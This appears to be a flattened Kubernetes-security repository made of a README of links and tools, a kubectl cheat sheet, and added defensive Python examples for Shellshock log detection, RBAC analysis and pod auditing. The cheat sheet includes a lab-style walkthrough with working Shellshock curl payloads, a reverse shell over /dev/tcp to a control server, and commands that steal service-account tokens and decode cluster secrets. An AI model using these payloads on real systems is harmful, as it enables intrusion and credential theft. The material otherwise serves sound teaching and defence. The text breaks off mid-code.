```
├── art
│   ├── HackingKubernetes.png
│   ├── ports_kubernetes.png
│   ├── HackingKubernetes0.jpg
│   └── kubernetes_arquitecture.png
├── pdf
│   ├── Learn by Hacking.zip
│   └── k8s_cheatsheet.md
├── LICENSE
└── README.md
```

--------------------------------------------------------------------------------
/art/HackingKubernetes.png:
https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/HackingKubernetes.png

/art/ports_kubernetes.png:
https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/ports_kubernetes.png

/pdf/Learn by Hacking.zip:
https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/pdf/Learn by Hacking.zip

/art/HackingKubernetes0.jpg:
https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/HackingKubernetes0.jpg

/art/kubernetes_arquitecture.png:
https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/kubernetes_arquitecture.png

--------------------------------------------------------------------------------
/LICENSE:

MIT License

Copyright (c) 2024 Andrej Marinchenko

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/pdf/k8s_cheatsheet.md:

This guide has been created to help engineers debug applications that are deployed into Kubernetes and not behaving correctly.

## Pod & Container Introspection

| Command | Description |
| --- | --- |
| `kubectl get pods` | lists the current pods in the current namespace |
| `kubectl get pods -w` | watches pods continuously |
| `kubectl describe pod <pod>` | describe a pod |
| `kubectl get rc` | list the replication controllers |
| `kubectl get services` or `kubectl get svc` | list the services in the current namespace |
| `kubectl describe service <service>` or `kubectl describe svc <service>` | describe a service |
| `kubectl delete pod <pod>` | delete a pod |
| `kubectl get pods -o wide -w` | watch pods continuously and show info such as IP addresses and the nodes they are provisioned on |

## Cluster Introspection

| Command | Description |
| :--- | :--- |
| `kubectl version` | get version info |
| `kubectl cluster-info` | get cluster info |
| `kubectl config view` | get cluster config |
| `kubectl describe node <node>` | output info about a node |
| `kubectl get nodes -w` | watch nodes continuously |
| `kubectl get nodes -o wide` | gives a detailed view of nodes, including internal and external IP addresses |

## Debugging

| Command | Description |
| --- | --- |
| `kubectl exec -ti <pod> [-c <container>] -- <command>` | execute a command on a pod, optionally in a given container |
| `klog <pod> [-c <container>]` or `kubectl logs -f <pod> [-c <container>]` | get logs of a given pod or, optionally, of one container |

## Networking

| Command | Description |
| --- | --- |
| `kubectl exec -ti <pod> -- /bin/sh -c "curl -v telnet://<host>:<port>"` | testing TCP connectivity between services |

## Other resources

- check whether an action is allowed in your Kubernetes cluster

Use `amicontained` to find out what container runtime you're using as well as what capabilities your container has.

```
# Export the sha256sum for verification.
$ export AMICONTAINED_SHA256="4e32545f68f25bcbcd4cce82743e916a054e1686df44fab68420fc9f94f80b21"

# Download and check the sha256sum.
$ curl -fSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.7/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" \
	&& echo "${AMICONTAINED_SHA256}  /usr/local/bin/amicontained" | sha256sum -c - \
	&& chmod a+x "/usr/local/bin/amicontained"

$ echo "amicontained installed!"

# Run it!
$ amicontained -h
```

Add these functions to your environment so that you can scan for open ports:

```
sudo apt-get update
sudo apt-get install nmap

# Scan the ports commonly used by Kubernetes components on the given targets.
nmap-kube () {
    nmap --open -T4 -A -v -Pn -p 443,2379,4194,6782-6784,6443,8443,8080,9099,10250,10255,10256 "${@}"
}

# Derive the local /24 from eth0 and scan it together with a few common private ranges.
nmap-kube-discover () {
    local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
    local SERVER_RANGES=" ";
    SERVER_RANGES+="10.0.0.1 ";
    SERVER_RANGES+="10.0.1.* ";
    SERVER_RANGES+="10.*.0-1.* ";
    nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}

nmap-kube-discover
```

Part 1: compromise via shellshock

Useful commands for finding open ports:

```
command nmap -Pn -T4 -F --open <ip>
# scanning every port, more is open
command nmap -Pn -T4 --open -p 0-65535 <ip>
command nmap -Pn -T4 --open -p 30081 <ip>
```

1. Check shellshock

```
curl http://<ip>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "cat /etc/passwd"'
```

2. create a control server to use as a reverse shell endpoint

this requires any node with a public IP (a digital ocean server would do)

```
# replace `controlplane` with a host that you can SSH to
ssh controlplane ip a

# replace 1234 with a port that is routable on the host you have SSH'd into
while :; do ssh controlplane ncat --listen 1234 --output $(mktemp /tmp/hack-XXXX.log); done
```

3. shellshock in

```
curl http://<ip>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "echo hello"'
```

Hardcore version:

```
while :; do curl http://<ip>:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "test -f /tmp/k || wget -O /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.11.2/bin/linux/amd64/kubectl && chmod +x /tmp/k && /tmp/k version; df -h; while :; do nohup bash -i >& /dev/tcp/<control-server-ip>/1234 0>&1; sleep 1; done"'; done
```

Part 2:

Kubectl SA: steal secret with ssh password in (flag)

### Steps

1. on the control server, or via individual shellshock commands:

Search for secrets:

```
df -h
cat /run/secrets/kubernetes.io/serviceaccount/token; echo

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get nodes

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify auth can-i get secrets --namespace kube-system
```

2. pull secrets from the API server for this namespace (there's a service account mounted that can read kube-system)

```
/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secrets -n shellshock
```

3. we've found secrets, now decode them

> first way requires manual base64 decode, second is a one-liner

```
/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --request-timeout 5s --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -o yaml -n shellshock

/tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -n shellshock -o 'go-template={{index .data "ssh_password"}}' | base64 -d; echo
```

4. find password for ssh server in flag

5. write password in local file to win (or just tell ControlPlane!) TODO(low): write test for this

```
echo 'What kind of plane is it?' > /tmp/flag
```

--------------------------------------------------------------------------------
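The Part 1 probe works by placing a bash function definition, `() { ... }`, in an HTTP header that a CGI script exports into the environment (CVE-2014-6271). On the defending side, the same signature is what you look for in web server access logs. The script below is an added example written for this page, not code from the repository or its author; it parses access-log lines in the Apache/nginx "combined" format and reports every record whose User-Agent, Referer or request line carries that signature. The log lines are constructed samples, not real traffic.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed access-log lines in the Apache/nginx "combined" format. They are
# samples written for this example, not records from any real server. Lines 3
# and 4 carry a Shellshock-style function definition in a header field.
SAMPLE_LOG = """\
10.0.0.12 - - [01/Jan/2024:12:00:01 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.13 - - [01/Jan/2024:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/8.0.1"
10.0.0.14 - - [01/Jan/2024:12:00:03 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 0 "-" "() { :; }; echo; /bin/bash -c \\"id\\""
10.0.0.15 - - [01/Jan/2024:12:00:04 +0000] "GET /cgi-bin/stats HTTP/1.1" 500 0 "() { :;}; /bin/sleep 5" "Mozilla/5.0"
"""

# Quoted fields may contain escaped quotes (\"), so each one is matched as a run
# of "anything except a quote or backslash, or a backslash followed by any char".
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"$'
)

# Shellshock payloads start with an empty function definition, "() {", possibly
# with whitespace in between; the command that follows varies, so match only that.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Only the fields the combined format records can be inspected here; payloads
# sent in Cookie, Host or custom headers need full request logging or a WAF.
INSPECTED_FIELDS = ("ua", "referer", "request")


@dataclass
class Finding:
    ip: str
    timestamp: str
    field: str      # which log field carried the payload
    path: str       # requested path (CGI endpoints are the usual target)
    payload: str


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(text: str) -> List[Finding]:
    """Return one Finding per log field that contains a Shellshock signature."""
    findings: List[Finding] = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split(" ")
        path = parts[1] if len(parts) > 1 else rec["request"]
        for field in INSPECTED_FIELDS:
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append(Finding(rec["ip"], rec["ts"], field, path, rec[field]))
    return findings


def count_by_source(findings: List[Finding]) -> Dict[str, int]:
    """Number of probe hits per source IP, a convenient pivot for alerting."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.ip] = counts.get(f.ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f.timestamp} {f.ip} {f.field}={f.payload!r} path={f.path}")
    print(count_by_source(hits))
```

Feed it a real access log with `scan_log(open(path).read())`. A hit on a `/cgi-bin/` path from a host whose bash is unpatched is the case to escalate; a hit against a static path is still worth recording, because it shows who is scanning.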

/README.md:

# HackingKubernetes

HackingKubernetes is a collection of resources on Kubernetes security. Kubernetes is a leading container management system in development pipelines across the world, but it is not exempt from malicious attacks. Using Kubernetes requires a deep understanding of the Kubernetes environment, including the different vulnerabilities you can be exposed to while creating, deploying, or running applications in your clusters.

Since your Kubernetes cluster is likely one of your most valuable cloud resources, it needs to be protected. Kubernetes security addresses the safety of your cloud, application clusters, containers, apps and code. Although Kubernetes provides inherent security advantages, bolstering your defensive tactics is crucial to protecting your system against hackers and other cybersecurity threats.

## Intro
- [OWASP Kubernetes Top Ten](https://owasp.org/www-project-kubernetes-top-ten/)
- [Kubernetes adoption, security, and market trends report](https://www.redhat.com/en/resources/kubernetes-adoption-security-market-trends-overview)

### Official Kubernetes documentation
- [Kubernetes Documentation](https://kubernetes.io/docs/home/)
- [Github repo kubernetes](https://github.com/kubernetes/kubernetes/)
- [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/)
- [Security kubernetes](https://kubernetes.io/docs/concepts/security/)
- [Docker Engine security](https://docs.docker.com/engine/security/)

### Security resources
- [Container Security Site](https://www.container-security.site/)
- [KubeCon + CloudNativeCon Europe 2024](https://www.youtube.com/playlist?list=PLj6h78yzYM2N8nw1YcqqKveySH6_0VnI0)
- [Cloud native computing foundation](https://www.cncf.io/)

### Intro from TryHackMe (free)
- [Intro to IaC](https://tryhackme.com/r/room/introtoiac)
- [Intro to IaC with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Intro%20to%20IaC.md)
- [Microservices Architectures](https://tryhackme.com/r/room/microservicearchitectures)
- [Microservices Architectures with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Microservices%20Architectures.md)
- [Kubernetes for Everyone](https://tryhackme.com/r/room/kubernetesforyouly)
- [Kubernetes for Everyone with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Kubernetes%20for%20Everyone.md)
- [K8s Best Security Practices](https://tryhackme.com/r/room/k8sbestsecuritypractices)
- [K8s Best Security Practices with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/K8s%20Best%20Security%20Practices.md)
- [Cluster Hardening](https://tryhackme.com/r/room/clusterhardening)
- [Cluster Hardening with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Cluster%20Hardening.md)
- [Frank & Herby make an app](https://tryhackme.com/r/room/frankandherby)
- [Frank & Herby make an app with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Frank%20%26%20Herby%20make%20an%20app.md)

### Intro from vmware
- [What is Kubernetes?](https://www.vmware.com/topics/kubernetes)
- [What is DevSecOps?](https://tanzu.vmware.com/devsecops)
- [What is Kubernetes Architecture?](https://www.vmware.com/topics/kubernetes-architecture)
- [What are Kubernetes Services?](https://www.vmware.com/topics/kubernetes-services)
- [What is Kubernetes Security?](https://www.vmware.com/topics/kubernetes-security)
- [What is Kubernetes Networking?](https://www.vmware.com/topics/kubernetes-networking)
- [What are Kubernetes Clusters vs. Nodes vs. Pods vs. Containers vs. Containerized Applications?](https://www.vmware.com/topics/components-kubernetes)
- [What are Kubernetes Pods?](https://www.vmware.com/topics/kubernetes-pods)

### Intro from yarsalabs
- [A Deep Dive Into Kubernetes Pods](https://blog.yarsalabs.com/a-deep-dive-into-kubernetes-pods/)
- [Installing the Components required for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part1/)
- [TLS Certificates Management for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part2/)
- [ETCD Server Setup for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part3/)
- [Generating Kubernetes Configuration Files for Authentication](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part4/)
- [Creating the Kubernetes Control Plane](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part5/)

### Cheatsheets
- [quick reference](https://kubernetes.io/docs/reference/kubectl/quick-reference/)
- [k8s_cheatsheet.md](https://github.com/BEPb/HackingKubernetes/blob/master/pdf/k8s_cheatsheet.md)
- [k8s-cheat-sheet](https://encore.dev/resources/k8s-cheat-sheet)
- [kubernetes-cheat-sheet](https://www.mirantis.com/blog/kubernetes-cheat-sheet)
- [Kubernetes Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data)

![arquitecture](art/kubernetes_arquitecture.png)
![ports](art/ports_kubernetes.png)

### Articles: How to Hack Kubernetes
- [How to Hack Kubernetes (and How to Protect It)](https://goteleport.com/blog/how-to-hack-kubernetes/)
- [Securing Kubernetes Clusters by Eliminating Risky Permissions](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions)
- [Kubernetes Pentest Methodology Part 1](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1)
- [Kubernetes Pentest Methodology Part 2](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2)
- [Kubernetes Pentest Methodology Part 3](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3)
- [Eight Ways to Create a Pod](https://www.cyberark.com/resources/threat-research-blog/eight-ways-to-create-a-pod)
- [Kubernetes Pod Escape Using Log Mounts](https://www.aquasec.com/blog/kubernetes-security-pod-escape-log-mounts/)
- [The Route to Root: Container Escape Using Kernel Exploitation](https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation)
- [Attacking Kubernetes clusters using the Kubelet API](https://faun.pub/attacking-kubernetes-clusters-using-the-kubelet-api-abafc36126ca)
- [Threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/)
- [Secure containerized environments with updated threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/)
- [Introduction to GKE Kubelet TLS Bootstrap Privilege Escalation](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/)
- [Bad Pods: Kubernetes Pod Privilege Escalation](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation)
- [Bad Pods github](https://github.com/BishopFox/badPods)
- [Hacking Kubelet on Google Kubernetes Engine](https://www.4armed.com/blog/hacking-kubelet-on-gke/)

### PDF
- [Learn by Hacking](https://github.com/calinah/learn-by-hacking-kccn/blob/master/Learn%20by%20Hacking.pdf)

### Kubernetes Security
- [Kubernetes Security Best Practices everyone must follow](https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow)
- [Securing a Cluster](https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster)
- [Security Best Practices for Kubernetes Deployment](https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment)
- [Kubernetes Security Best Practices](https://phoenixnap.com/kb/kubernetes-security-best-practices)
- [Kubernetes Security 101: Risks and 29 Best Practices](https://www.stackrox.com/post/2020/05/kubernetes-security-101)
- [15 Kubernetes security best practice to secure your cluster](https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster)
- [The Ultimate Guide to Kubernetes Security](https://neuvector.com/container-security/kubernetes-security-guide)
- [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked)
- [12 Kubernetes configuration best practices](https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server)
- [A Practical Guide to Kubernetes Logging](https://logz.io/blog/a-practical-guide-to-kubernetes-logging)
- [Kubernetes Web UI (Dashboard)](https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard)
- [OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION](https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud)
- [Introducing Policy As Code: The Open Policy Agent (OPA)](https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa)
- [What service mesh provides](https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf)
- [Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1](https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1)
- [Open Policy Agent: What Is OPA and How It Works (Examples)](https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works)
- [Send Kubernetes Metrics To Kibana and Elasticsearch](https://logit.io/sources/configure/kubernetes/)
- [Kubernetes Security Checklist](https://kubernetes.io/docs/concepts/security/security-checklist/)

## Container & Kubernetes Security Tools

This is a list of open source tools which help with areas related to container security. Some of the tools in this list don't fit neatly into a specific category or categories, so they're listed with the closest option.

### Container Attack Surface Assessment & Breakout Tools

Useful tools to run inside a container to assess the sandbox that's in use, and exploit some common breakout issues.

- deepce - Docker Enumeration, Escalation of Privileges and Container Escapes
- CDK - Container and Kubernetes auditing and breakout tool

### Container Vulnerability Scanning Tools

- Trivy - Vulnerability and IaC scanner
- Grype - Container vulnerability scanner
- clair - Container vulnerability scanner
- Docker Scout - Container vulnerability scanner
- dep-scan - Vulnerability and misconfiguration scanner
- Neuvector Scanner - Container vulnerability scanning tool

### IaC Scanning Tools that cover container formats

- Trivy - Vulnerability and IaC scanner
- Checkov - IaC scanner
- KICS - IaC scanner
- dep-scan - Vulnerability and misconfiguration scanner
- Terrascan - IaC scanner for various formats including Docker and Kubernetes
- hadolint - Dockerfile linter

### Docker Security Tools

- docker bench - Docker CIS Benchmark assessment tool
- Dockle - Container image linter
- cnspec - Assessment tool for multiple platforms including Docker and Kubernetes

### Container Runtime Security Tools

- Tracee - Container runtime security tooling
- Falco - Container runtime security tooling
- Kubearmor - Container runtime security enforcement tool
- Tetragon - Container runtime security tool

### Container Registry Tools

- regclient - Another tool for interacting with container registries
- crane - Tool for interacting with container registries
- skopeo - Tool for interacting with container registries

### Container Image Tools

- Dive - Tool for exploring container image layers

### Kubernetes Tools

#### RBAC Assessment Tools

- rbac-tool - RBAC tool for Kubernetes
- kubiScan - Tool to scan Kubernetes clusters for risky permissions
- krane - Kubernetes RBAC static analysis & visualisation tool
- eathar - Kubernetes security assessment tool focusing on workload security and RBAC
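The RBAC tools above answer the question that Part 2 of the cheat sheet exploits: which identities can read secrets, and in which namespaces? The walkthrough relies on a pod's default service account being able to `get secrets` in kube-system, a grant that only shows up when you resolve bindings across namespaces. The script below is an added example written for this page, not code from any of the listed tools or from the repository; it resolves Roles, ClusterRoles, RoleBindings and ClusterRoleBindings in the shape `kubectl get ... -o json` returns and lists the subjects that can perform a verb on a resource in a given namespace. The RBAC objects are constructed samples. It does not model aggregated ClusterRoles, `nonResourceURLs` or the implicit `system:masters` group.

```python
from typing import Any, Dict, List, Optional, Set

# Constructed RBAC objects in the shape kubectl returns with "-o json" (only the
# fields this example needs). They are not taken from any real cluster.
RBAC_OBJECTS: List[Dict[str, Any]] = [
    {"kind": "ClusterRole", "metadata": {"name": "secret-reader"},
     "rules": [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"kind": "Role", "metadata": {"name": "pod-reader", "namespace": "shellshock"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
    {"kind": "RoleBinding", "metadata": {"name": "read-secrets", "namespace": "shellshock"},
     "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "shellshock"}]},
    # A RoleBinding in kube-system may name a service account from another
    # namespace; this is the kind of grant the walkthrough above depends on.
    {"kind": "RoleBinding", "metadata": {"name": "ks-secrets", "namespace": "kube-system"},
     "roleRef": {"kind": "ClusterRole", "name": "secret-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "shellshock"}]},
    {"kind": "RoleBinding", "metadata": {"name": "pods", "namespace": "shellshock"},
     "roleRef": {"kind": "Role", "name": "pod-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "web", "namespace": "shellshock"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "admins"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "User", "name": "alice"}]},
]

CORE_GROUP = ""  # secrets, pods and other core resources live in the "" API group


def rule_allows(rule: Dict[str, Any], verb: str, resource: str,
                api_group: str = CORE_GROUP, resource_name: Optional[str] = None) -> bool:
    """True if one PolicyRule grants verb on resource; "*" wildcards match anything."""
    if not (verb in rule.get("verbs", []) or "*" in rule.get("verbs", [])):
        return False
    if not (api_group in rule.get("apiGroups", []) or "*" in rule.get("apiGroups", [])):
        return False
    if not (resource in rule.get("resources", []) or "*" in rule.get("resources", [])):
        return False
    names = rule.get("resourceNames")
    # A rule limited to resourceNames does not cover "any secret": it only
    # matches when the caller asks about one of those specific names.
    if names and resource_name not in names:
        return False
    return True


def subject_id(subject: Dict[str, Any]) -> str:
    if subject["kind"] == "ServiceAccount":
        return f"ServiceAccount:{subject.get('namespace', 'default')}/{subject['name']}"
    return f"{subject['kind']}:{subject['name']}"


def who_can(objects: List[Dict[str, Any]], verb: str, resource: str, namespace: str,
            api_group: str = CORE_GROUP, resource_name: Optional[str] = None) -> Set[str]:
    """Subjects allowed to perform verb on resource inside namespace."""
    roles: Dict[tuple, List[Dict[str, Any]]] = {}
    for obj in objects:
        if obj["kind"] == "ClusterRole":
            roles[("ClusterRole", None, obj["metadata"]["name"])] = obj["rules"]
        elif obj["kind"] == "Role":
            roles[("Role", obj["metadata"]["namespace"], obj["metadata"]["name"])] = obj["rules"]
    allowed: Set[str] = set()
    for obj in objects:
        if obj["kind"] == "ClusterRoleBinding":
            # Grants the ClusterRole's rules in every namespace.
            key = ("ClusterRole", None, obj["roleRef"]["name"])
        elif obj["kind"] == "RoleBinding":
            if obj["metadata"]["namespace"] != namespace:
                continue  # a RoleBinding only grants inside its own namespace
            ref = obj["roleRef"]
            key = (ref["kind"], None if ref["kind"] == "ClusterRole" else namespace, ref["name"])
        else:
            continue
        if any(rule_allows(r, verb, resource, api_group, resource_name) for r in roles.get(key, [])):
            allowed.update(subject_id(s) for s in obj.get("subjects", []))
    return allowed


def service_accounts_reading_secrets(objects: List[Dict[str, Any]]) -> Dict[str, List[str]]:
    """Per namespace that has RoleBindings: service accounts able to get or list secrets there."""
    namespaces = {o["metadata"]["namespace"] for o in objects if o["kind"] == "RoleBinding"}
    report: Dict[str, List[str]] = {}
    for ns in sorted(namespaces):
        subjects = who_can(objects, "get", "secrets", ns) | who_can(objects, "list", "secrets", ns)
        sas = sorted(s for s in subjects if s.startswith("ServiceAccount:"))
        if sas:
            report[ns] = sas
    return report


if __name__ == "__main__":
    print(sorted(who_can(RBAC_OBJECTS, "get", "secrets", "kube-system")))
    print(service_accounts_reading_secrets(RBAC_OBJECTS))
```

On a live cluster, `kubectl get roles,clusterroles,rolebindings,clusterrolebindings -A -o json` yields an `items` list you can pass straight to `who_can`. A `default` service account appearing in the secrets report for any namespace is the condition to fix: bind a dedicated, least-privilege service account instead and set `automountServiceAccountToken: false` on pods that do not need the API.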

#### Kubernetes Security Auditing Tools

- kube-bench - Tool to assess compliance with the CIS benchmark for various Kubernetes distributions
- kubescape - Kubernetes security assessment tool
- kubeaudit - Kubernetes security assessment tool focusing on workload security
- kubesec - Kubernetes security assessment tool focusing on workload security
- kubescore - Kubernetes security and reliability assessment tool focusing on workload security
- eathar - Kubernetes security assessment tool focusing on workload security and RBAC
- popeye - Kubernetes cluster scanner, looking for possible misconfigurations
- cnspec - Assessment tool for multiple platforms including Docker and Kubernetes
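The workload-focused auditors above (kubeaudit, kubesec, kube-score) check pod specs for the settings that the "Bad Pods" and "Pod Escape Using Log Mounts" articles linked earlier turn into node compromise, and for the automatically mounted service-account token that the cheat sheet's Part 2 reads from `/run/secrets`. The following is an added example written for this page, not code from any of those tools or from the repository: a small auditor over a pod object in `kubectl get pod -o json` shape, run against one constructed risky pod and one constructed hardened pod. The severity labels and the list of sensitive host paths are this example's own choices.

```python
from typing import Any, Dict, List, Tuple

Finding = Tuple[str, str, str]  # (severity, check id, message)

# Host paths whose mounting lets a container read or alter the node itself;
# "/" is handled separately because every path is under it.
SENSITIVE_HOST_PATHS = ("/var/run/docker.sock", "/run/containerd", "/var/log", "/etc", "/root")
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}
SEVERITY_ORDER = ("critical", "high", "medium", "low")


def is_sensitive_path(path: str) -> bool:
    norm = path.rstrip("/") or "/"
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS)


def audit_pod(pod: Dict[str, Any]) -> List[Finding]:
    """Return findings for the risky settings in one pod object (kubectl -o json shape)."""
    spec = pod.get("spec", {})
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    pod_sc = spec.get("securityContext") or {}
    findings: List[Finding] = []

    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(("high", flag, f"{name}: shares the host {flag[4:]} namespace"))

    # Kubernetes mounts a service-account token into every container unless the
    # pod opts out; the walkthrough above reads exactly that file.
    if spec.get("automountServiceAccountToken") is not False:
        findings.append(("medium", "automountServiceAccountToken",
                         f"{name}: service-account token is mounted (default)"))

    for vol in spec.get("volumes", []):
        host_path = (vol.get("hostPath") or {}).get("path")
        if host_path is not None:
            sev = "high" if is_sensitive_path(host_path) else "medium"
            findings.append((sev, "hostPath", f"{name}: mounts host path {host_path}"))

    for c in spec.get("initContainers", []) + spec.get("containers", []):
        sc = c.get("securityContext") or {}
        cname = f"{name}/{c.get('name', '?')}"
        if sc.get("privileged"):
            findings.append(("critical", "privileged", f"{cname}: privileged container"))
        if sc.get("allowPrivilegeEscalation") is not False:
            findings.append(("low", "allowPrivilegeEscalation",
                             f"{cname}: allowPrivilegeEscalation not set to false"))
        # A container-level runAsNonRoot overrides the pod-level setting.
        if sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot")) is not True:
            findings.append(("low", "runAsNonRoot", f"{cname}: may run as root"))
        added = set((sc.get("capabilities") or {}).get("add", [])) & DANGEROUS_CAPS
        if added:
            findings.append(("high", "capabilities", f"{cname}: adds {sorted(added)}"))
    return findings


def max_severity(findings: List[Finding]) -> str:
    """Highest severity present, or "none" for a clean pod."""
    for sev in SEVERITY_ORDER:
        if any(f[0] == sev for f in findings):
            return sev
    return "none"


# Constructed pod objects (not from any real cluster): one with several of the
# settings the "Bad Pods" article describes, and one hardened equivalent.
BAD_POD = {
    "metadata": {"name": "bad-pod"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "docker", "hostPath": {"path": "/var/run/docker.sock"}},
                    {"name": "logs", "hostPath": {"path": "/var/log"}}],
        "containers": [{"name": "shell", "image": "busybox",
                        "securityContext": {"privileged": True,
                                            "capabilities": {"add": ["SYS_ADMIN"]}}}],
    },
}
HARDENED_POD = {
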